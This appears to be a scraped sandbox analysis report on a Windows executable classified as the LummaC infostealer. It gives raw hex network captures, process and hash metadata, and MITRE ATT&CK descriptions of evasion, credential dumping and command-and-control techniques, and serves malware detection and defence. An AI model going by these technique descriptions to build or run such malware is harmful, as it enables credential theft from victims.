2024-12-23 16:30:28 UTC	1749	IN	Data Raw: 36 6c d8 a0 d8 b8 71 63 33 36 6d da d4 c8 e6 cd 9b 1b d9 b2 65 8b 42 be 6f dd ba 55 21 d3 b7 6d db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 Data Ascii: 6lqc36meBoU!m/od}z:@@eCY\| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg\|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.6
2024-12-23 16:30:28 UTC	16384	IN	Data Raw: f3 f4 e5 2c fa 8b d6 6e a0 f9 db f7 d0 9b cc 4a 88 37 9b 81 b5 cb 97 d9 92 b5 3d 81 9b 49 5f 84 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 Data Ascii: ,nJ7=I_AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{\|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw
2024-12-23 16:30:28 UTC	1024	IN	Data Raw: a7 8e 1e 9c 40 02 bb 31 29 24 25 52 1a 27 ce 34 4e 62 c1 bb bd 69 f3 73 33 69 41 bb a7 99 27 79 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2 Data Ascii: @1)$%R'4Nbis3iA'y\|Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U\|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>
2024-12-23 16:30:28 UTC	16384	IN	Data Raw: f3 34 9e a7 37 ca 6c 39 b9 e9 d4 0d 8e 25 5a ee e8 d2 c7 6d e2 6e 1e ee e4 e6 ee a6 04 7f d3 d2 f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65 Data Ascii: 47l9%ZmnzRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}\|W Qp9Rx@Y%X$=x$Fqx.ve

Target ID:	0
Start time:	11:29:57
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\NAnOVCOt4L.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NAnOVCOt4L.exe"
Imagebase:	0x30000
File size:	2'875'392 bytes
MD5 hash:	352456D0FC286CCABE5D1AD2EFC6CA5C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:30:30
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 1804
Imagebase:	0x760000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 015333BA Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

C\U, xrefs: 015334C0

Memory Dump Source

Source File: 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false

Associated: 00000000.00000003.1832029852.000000000152D000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_152d000_NAnOVCOt4L.2.jbxd

Similarity

API ID:
String ID: C\U
API String ID: 0-1292758752
Opcode ID: bfb50be0bedec11dbeb833bf744d56bbc98fb6913795ec4d4ab020ab7f4d3776
Instruction ID: 0808e003328f90fed2961b4bf1dc43165905e2e65d604e88a274a4c4dc92ccdc
Opcode Fuzzy Hash: bfb50be0bedec11dbeb833bf744d56bbc98fb6913795ec4d4ab020ab7f4d3776
Instruction Fuzzy Hash: 7751623041A792AFCB17CF38C15A186BFA1FF42720B5845EED9814F067E3249236CB96

Function 014C4D45 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1832109571.00000000014BD000.00000004.00000020.00020000.00000000.sdmp, Offset: 014BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_14bd000_NAnOVCOt4L.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7002b7212056f7d0da2408d3e1a9757b7e639166790e6ae6235c705b0b3de313
Instruction ID: b941feac786376bfd87bbb534db6659f1493502d16bf6b2dd3152d1a7cc995a2
Opcode Fuzzy Hash: 7002b7212056f7d0da2408d3e1a9757b7e639166790e6ae6235c705b0b3de313
Instruction Fuzzy Hash: 43F0C21140FBC52FC717A730AAB6584BF70AE43208B5E48CFC5C08B5B3D299089AE323

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NAnOVCOt4L.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NAnOVCOt4L.exe_e03ff422de458d3e02686ecdabbdd9a5191feef_626da107_6520921b-e6d1-4654-8976-83bca05cd540\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC900.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA59.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA89.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Windows Analysis Report
NAnOVCOt4L.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre